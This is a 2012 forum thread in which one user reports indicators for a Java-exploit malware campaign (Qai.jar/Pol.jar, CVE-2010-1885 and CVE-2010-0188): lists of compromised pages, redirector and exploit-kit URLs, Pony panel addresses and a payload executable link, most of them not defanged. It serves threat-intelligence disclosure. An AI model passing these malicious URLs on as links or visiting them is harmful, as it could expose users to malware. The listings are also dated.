    72.14.184.90/content/ap2.php?f=14095 [CVE-2010-0188, CVE-2010-1885]

     Data that is stored in the cloud may become lost in the fog.

  17. User picture
    • NotBuyingIt on Mon 26 Mar 2012
    • 04:41:19 AM UTC

    RE: Qai.jar malware (CVE-2010-1885)

    88.85.99.44:8080/showthread.php?t=73a07bcb51f4be71
    88.85.99.44:8080/showthread.php?t=d7ad916d1c0396ff
    88.85.99.44:8080/Qai.jar

    [Edit: add 23:15 UTC]
    hXXp://88.85.99.44/pony/gate.php (Caution from http://www.spamhaus.org/sbl/query/SBL134160)

    b-dash.jp/5FP2YpGU/index.html
    110.50.202.195/5FP2YpGU/index.html

    The following redirection target does not currently respond and I have seen no adverse reports about it
    184.82.202.46/showthread.php?t=d7ad916d1c0396ff

     Data that is stored in the cloud may become lost in the fog.

  18. User picture
    • NotBuyingIt on Tue 27 Mar 2012
    • 05:29:16 AM UTC

    RE: Qai.jar malware (CVE-2010-1885)

    Note: The following web page (reported earlier) is still online and active; however the external JavaScript that it uses has been removed.
    thechange180.com/QnXBRiWS/index.html

     Data that is stored in the cloud may become lost in the fog.

  19. User picture
    • NotBuyingIt on Tue 27 Mar 2012
    • 06:42:15 AM UTC

    RE: aiopgiovani.it (Qai.jar malware)

    Cross-reference: This comment repiies to http://www.mywot.com/forum/21598-case-closed-ai...

    Here are the reported malicious webpages on aiopgiovani.it. Perhaps they have been disabled, but the server doesn't return HTTP 404.
    URL | First Seen | Last Seen
    hXXp://www.aiopgiovani.it/CJbRz2fy/index.html 2012-03-22 08:28:23 2012-03-22 15:53:52
    hXXp://www.aiopgiovani.it/DRk5XAM2/index.html 2012-03-22 15:53:52 (same)
    hXXp://www.aiopgiovani.it/enzfjWNu/index.html 2012-03-22 12:34:38 2012-03-22 15:53:53
    hXXp://www.aiopgiovani.it/fbKKzzY1/index.html 2012-03-22 15:53:54 (same)
    hXXp://www.aiopgiovani.it/FoSxV9z1/index.html 2012-03-22 15:53:55 2012-03-23 00:15:29
    hXXp://www.aiopgiovani.it/KR29WqKT/index.html 2012-03-22 15:53:55 (same)
    hXXp://www.aiopgiovani.it/qHBi6ELG/index.html 2012-03-22 15:53:56 (same)
    hXXp://www.aiopgiovani.it/R1oGTgYa/index.html 2012-03-22 15:53:56 (same)

     Data that is stored in the cloud may become lost in the fog.

  20. User picture
    • NotBuyingIt on Wed 28 Mar 2012
    • 04:07:54 AM UTC

    RE: Pol.jar malware (CVE-2010-1885)

    The name of the Java archive has changed to Pol.jar

    74.91.114.84/showthread.php?t=73a07bcb51f4be71
    74.91.114.84/content/ap2.php?f=14095

    wildestbug.com/showthread.php?t=73a07bcb51f4be71 (site unresponsive)
    wildestbug.com/data/ap2.php?f=14095
    wildestbug.com/data/Pol.jar

    buzzbackpackers.com/zkNQ6jvK/index.html
    cuzco-peru.travel/HavrCsjG/index.html
    billdirect.jiffyinc.com/Lm2Rtpmd/js.js
    emme3w-vps.m3w.it/agUgfPP0/js.js
    186.5.23.154:8082/showthread.php?t=73a07bcb51f4be71
    186.5.23.154:8082/data/Pol.jar
    186.5.23.154:8082/q.php?f=14095

    91.121.178.156:8080/showthread.php?t=73a07bcb51f4be71 (unstable connections)
    91.121.178.156:8080/q.php?f=14095

     Data that is stored in the cloud may become lost in the fog.

  21. User picture
    • NotBuyingIt on Wed 28 Mar 2012
    • 08:07:53 PM UTC

    RE: Qai.jar malware (CVE-2010-1885)

    alessandromassaini.com.br/iQQvWcsE/index.html
    fiktiv.hr/EHg4pBAK/index.html
    cubica.com.ec/xr54cK4e/js.js (HTTP 404)
    animahu.com/kvyMGCHQ/js.js (HTTP 404)
    agenciatransfusional.com.br (HTTP 404)

    62.112.130.165:8080/showthread.php?t=73a07bcb51f4be71 (site unresponsive)
    62.112.130.165:8080/q.php?f=14095

    186.5.23.154:8082/showthread.php?t=73a07bcb51f4be71 (site unresponsive)
    186.5.23.154:8082/data/ap2.php?f=14095
    186.5.23.154:8082/data/Pol.jar

    176.28.18.135/pony/gate.php (Caution from: http://www.threatexpert.com/report.aspx?md5=99fab9... )

     Data that is stored in the cloud may become lost in the fog.

  22. User picture
    • NotBuyingIt on Thu 29 Mar 2012
    • 08:23:25 AM UTC

    RE: Pol.jar malware (CVE-2010-1885)

    The following site may reply with HTTP 403 to some requests but the following URLs are active. The meta tag "robots" is set to "noindex, nofollow".
    clearschooner.com/showthread.php?t=73a07bcb51f4be71
    50.56.208.113:8080/showthread.php?t=73a07bcb51f4be71
    clearschooner.com/showthread.php?t=d7ad916d1c0396ff
    clearschooner.com/data/Pol.jar

    www.gavinhall.com:8080

    50.116.50.82/showthread.php?t=d7ad916d1c0396ff
    50.116.50.82/data/ap2.php?f=ba33e
    50.116.50.82/data/Pol.jar
    crypt.im/pls.exe

    [Edit: Update on 29-March-2012 18:00 UTC]
    clearschooner.com (Creation Date: 28-mar-2012) has been suspended; its domain registrar MONIKER ONLINE SERVICES, INC has set its status to clientHold. Its DNS (monikerdns.net) continues to link it to IP 50.116.50.82 on the Linode Network in the USA; however the server at that IP address appears to have gone offline.

    Readers who are following this botnet may wish to examine any similarly named domains which were created near the same time as clearschooner.com

    50.56.208.113:8080/showthread.php?t=d7ad916d1c0396ff
    50.56.208.113/showthread.php?t=73a07bcb51f4be71
    50.56.208.113:8080/data/ap2.php?f=ba33e
    50.56.208.113:8080/data/Pol.jar
    crypt.im/pls.exe
    hXXp://www.gavinhall.com:8080/showthread.php?t=73a07bcb51f4be71

    edildomec.it/BULgi6Hg/index.html
    hayatiinanc.com/4TNmo63B/js.js
    a-tec.it/rnVbcJUC/js.js
    ftp.ilhadesantorini.com.br/nQ87ky7Y/js.js
    swissmobiledevelopment.ch/K7Q2vq48/js.js
    88.85.99.44:8080/showthread.php?t=d7ad916d1c0396ff (reported previously)
    88.85.99.44:8080/q.php?f=ba33

    83.174.131.142:8080/showthread.php?t=d7ad916d1c0396ff (unresponsive site)
    83.174.131.142:8080/data/ap2.php?f=ba33e

     Data that is stored in the cloud may become lost in the fog.

  23. User picture
    • NotBuyingIt on Thu 29 Mar 2012
    • 06:37:21 PM UTC

    RE: Pol.jar malware (CVE-2010-1885)

    becas-mexico.com/BULgi6Hg/index.html
    csu.com.vn/yXtPP0kN/index.html
    drgurkantellioglu.com/wAkuxoFT/index.html
    facturaciondigitaldelsureste.com/70U3uLRg/index.html
    www.gapinternational.com/yoPC0eVM/index.html

    174.120.119.209/LKwTTdC2/js.js
    a5numerique.fr/dSQi0euk/js.js
    elitamilano.org/6X4tQf6G/js.js
    gpatrol.com/XwWWQjzf/js.js
    maranatur.com.br/6Y701bwW/js.js
    nogalesdelarroyo.com.ar/6JHV6fR2/js.js
    ofgcompany.com/ZV2RAg5b/js.js
    telefonspass24.de/w2ziooxT/js.js
    uglyd.com/xTnfi7mG/js.js

     Data that is stored in the cloud may become lost in the fog.

  24. User picture
    • NotBuyingIt on Fri 30 Mar 2012
    • 12:39:12 AM UTC

    RE: Qai.jar malware (CVE-2010-1885)

    cashundercontrol.com/a1UZ9Deb/index.html
    cashundercontrol.com/y2yMPUY4/index.html
    cashundercontrol.com/xyicUbfE/index.html
    www.fondazionefc.it/xyicUbfE/index.html
    www.fondazionefc.it/zdG4P9ud/index.html
    www.fondazionefc.it/hnTkQu4T/index.html
    www.glassinitstyle.com/1KQCaT1n/index.html
    www.glassinitstyle.com/dbcrLxFh/index.html
    www.glassinitstyle.com/zdG4P9ud/index.html
    www.gsimoveis.net/zdG4P9ud/index.html
    ilhanirem.org/y2yMPUY4/index.html
    joelwieme.nl/jbx2DaYQ/index.html
    joelwieme.nl/2yLAvXvs/index.html
    joelwieme.nl/JhTyt0DK/index.html
    misshealthclub.com/ubTwv5QW/index.html
    misshealthclub.com/AjaAHS1k/index.html
    misshealthclub.com/RyCBUbaq/index.html
    niveran.it/MCqWAeMj/index.html
    niveran.it/AjaAHS1k/index.html
    niveran.it/29rZYVvY/index.html
    pothencia.com.br/0aGbTUcC/index.html
    pothencia.com.br/EXU7LG5U/index.html
    pothencia.com.br/yXtPP0kN/index.html
    revistadecines.com/hnTkQu4T/index.html
    revistadecines.com/WR7whto8/index.html
    revistadecines.com/y2yMPUY4/index.html
    rumski.com/EXU7LG5U/index.html
    rumski.com/0aGbTUcC/index.html
    rumski.com/erkEVBhG/index.html
    sprzedazownia.nets.pl/hnTkQu4T/index.html
    sprzedazownia.nets.pl/y2yMPUY4/index.html
    sprzedazownia.nets.pl/xyicUbfE/index.html
    stonechurchberlin.org/2yLAvXvs/index.html
    stonechurchberlin.org/jbx2DaYQ/index.html
    stonechurchberlin.org/yXtPP0kN/index.html

    shultzfamily.com/6bCo6tHS/js.js

     Data that is stored in the cloud may become lost in the fog.

  25. User picture
    • NotBuyingIt on Fri 30 Mar 2012
    • 03:46:49 PM UTC

    RE: (CVE-2010-0188) (CVE-2010-1885)

    [Edit: Added more sites 30-March-2012 16:28 UTC]

    168.144.168.82/kFfxpaXa/index.html
    ftp.damipas.altervista.org/kFfxpaXa/index.html
    ilarun.altervista.org/HYfgma9c/index.html
    maicolzonta.altervista.org/HYfgma9c/index.html
    ftp.gondwana14.org/v2NuNqQD/index.html
    isantamaria.com.ar/xYjS3FuU/index.html
    i-terra.com.ar/MCqWAeMj/index.html
    palmerovucovich.com.ar/cKAf4D1t/index.html
    petrogroup.info/cKAf4D1t/index.html
    rbtour.com.br/CYagS9aU/index.html
    senseoftaste.co.za/cKAf4D1t/index.html
    sneska.rs/cKAf4D1t/index.html
    stonechurchberlin.org/JhTyt0DK/index.html

    alfredodeluque.com.co/3WuiAbPd/js.js
    hdmiwebshop.nl/KXQ9MgMa/js.js [see Note 1 below]
    laurencecoiffure-isabelleesthetique.fr/yBKpyA9p/js.js
    raora.net/pszrL8tz/js.js
    riveradominguez.com/Wkin8E8z/js.js
    vianatura.sk/1jWreEwC/js.js

    174.140.163.119/showthread.php?t=d7ad916d1c0396ff
    174.140.163.119/q.php?f=ba33e

    [Edit: Update 06-April-2012 05:00 UTC][Edit: fixed URL (below) 13-January-2013 17:45 UTC]
    Note 1: See http://www.mywot.com/forum/21906-hdmiwebshop-nl...

     Data that is stored in the cloud may become lost in the fog.

  26. User picture
    • NotBuyingIt on Fri 30 Mar 2012
    • 05:52:08 PM UTC

    RE: Qai.jar malware (CVE-2010-1885)

    4realpeople.info/qedwZQiv/index.html
    interfinbrok.ro/1xmg2qrr/index.html
    jadore-events.ro/qedwZQiv/index.html
    kazahana.hanabie.com/FP817PwV/index.html
    kgncomputers.com/1xmg2qrr/index.html
    tajgo.com/hQLv8GxT/index.html

    giantsportsonline.co.za/kwcmbJgu/js.js
    orthokspecialist.co.uk/NN86eMN3/js.js
    pavelknotek.cz/aRLw3hH2/js.js
    renewcarvings.com/EXHRnDGP/js.js

     Data that is stored in the cloud may become lost in the fog.

  27. User picture
    • NotBuyingIt on Fri 30 Mar 2012
    • 09:22:51 PM UTC

    RE: Qai.jar malware (CVE-2010-1885)

    fdu.com.ve/dbcrLxFh/index.html
    gatitas69.es/7irbmfgK/index.html
    www.importladen.de/HYfgma9c/index.html
    izmircvb.org.tr/5pE362Xa/index.html
    krownaptel.com/29rZYVvY/index.html
    lagiostranelparco.it/5pE362Xa/index.html
    lindasbolsas.com.br/tsdBCGco/index.html [frequently reported, but responds "suspended page"]
    longfeng.cz/2yLAvXvs/index.html
    matcherup.com/qJQ0G8Ak/index.html
    mespapromosyon.com/2yLAvXvs/index.html
    pagd.info/yXtPP0kN/index.html
    parentproject.ro/2yLAvXvs/index.html
    pvrbluo.com/jbx2DaYQ/index.html
    reactcommunications.com/2KHQEgJc/index.html
    salonslabirebucuresti.ro/2yLAvXvs/index.html
    sevgiliyekurabiye.com/erkEVBhG/index.html
    shoppingbeiramar.com.br/yXtPP0kN/index.html
    sidomunculherbal.com/0aGbTUcC/index.html
    sropazar.org/yXtPP0kN/index.html
    terramaresturismo.com.br/2yLAvXvs/index.html

    netitec.com.br/yGGhKNze/js.js
    thecoffin.ghostdesign.com/v6QWF51L/js.js

    178.32.160.255:8080/showthread.php?t=d7ad916d1c0396ff
    178.32.160.255:8080/q.php?f=ba33e
    178.32.160.255:8080/data/ap2.php

     Data that is stored in the cloud may become lost in the fog.

  28. User picture
    • NotBuyingIt on Sat 31 Mar 2012
    • 01:13:32 AM UTC

    RE: (CVE-2010-0188) (CVE-2010-1885)

    10354.w54.wedos.net/qJQ0G8Ak/index.html
    adsorbtech.in/BZBmikS1/index.html
    cinecolorlab.com.ar/cs1TiGfh/index.html
    hascrafts.com/myg56Y48/index.html
    internauta.org.ar/5pE362Xa/index.html
    jojovintage.com.ar/XcLNkR7t/index.html
    kocsigorta.com.tr/29rZYVvY/index.html
    luigitomasoni.altervista.org/GdpEPG6m/index.html
    mail.news.marbona.ro/HYfgma9c/index.html
    metally.com.br/2yLAvXvs/index.html
    novarestobar.pl/BZBmikS1/index.html
    ratanmani.com/HYfgma9c/index.html
    saadetle.com/BZBmikS1/index.html
    seeker.co.nz/HYfgma9c/index.html
    sexybunnylove.com/2yLAvXvs/index.html
    tcm.com.tr/BZBmikS1/index.html
    tqlaboratorios.com/yXtPP0kN/index.html
    trendyfunwear.nl/0aGbTUcC/index.html
    10354.w54.wedos.net/qJQ0G8Ak/index.html

    goat-it.com/KQss1aWQ/js.js

     Data that is stored in the cloud may become lost in the fog.

  29. User picture
    • NotBuyingIt on Sat 31 Mar 2012
    • 03:01:08 PM UTC

    RE: Pol.jar malware (CVE-2010-1885)

    A variety of exploits are being seen by the malware campaign(s) followed in this thread. A newly published discussion of one of them is at
    http://garwarner.blogspot.com/2012/03/usps-click-n...

     Data that is stored in the cloud may become lost in the fog.

  30. User picture
    • NotBuyingIt on Sun 01 Apr 2012
    • 12:23:08 AM UTC

    RE: Pol.jar malware (CVE-2010-0188. CVE-2010-1885)

    20rueraspail.be/LypmU2em/index.html
    aciesse.it/cKAf4D1t/index.html
    aqua-beach-club-torre-del-greco.it/29rZYVvY/index.html
    fhc-p.org/CYagS9aU/index.html
    gnet.com.bd/Yyepruav/index.html
    gtr.hr/29rZYVvY/index.html
    hilalyapi.org/HYfgma9c/index.html
    indosmsfree.com/GdpEPG6m/index.html
    jbcapetown.101.es/HYfgma9c/index.html
    lvqr.101.es/BZBmikS1/index.html
    raintrain.de/rfcEctFD/index.html
    rtsearch.com/NQLG54qb/index.html

    nacionalsaude.com.br/rgYbgjdk/js.js
    pqnosdetalhes.com.br/eppLG6kE/js.js
    schluesseldienst-golz.de/MsgPLeUX/js.js
    update-informatique.com/uzCeGFdr/js.js

    [Edit: Added more sites (below) 01-April-2012 06:50 UTC]

    datasig.com.ar/0iBzU8pv/index.html
    merkez-otomotiv.com/cs1TiGfh/index.html
    h7xb37qx.utawebhost.at/9hEetc63/index.html
    ftp.wsop.pl/LzZWrHj5/index.html

    laspeziacaritas.it/1M4VoeVe/js.js
    ftp.planitur.com.br/dyEmcL4N/js.js
    quiztown.org/U2iBLpvu/js.js
    wap.tl/8M6kMfpV/js.js
    webizleme.com/e2htJnFF/js.js

    [Edit: Added site 01-April-2012 15:40 UTC]

    207.57.244.55/cKAf4D1t/index.html
    www.bairskeystone.com/cKAf4D1t/index.html (equivalent to IP 207.57.244.55)

     Data that is stored in the cloud may become lost in the fog.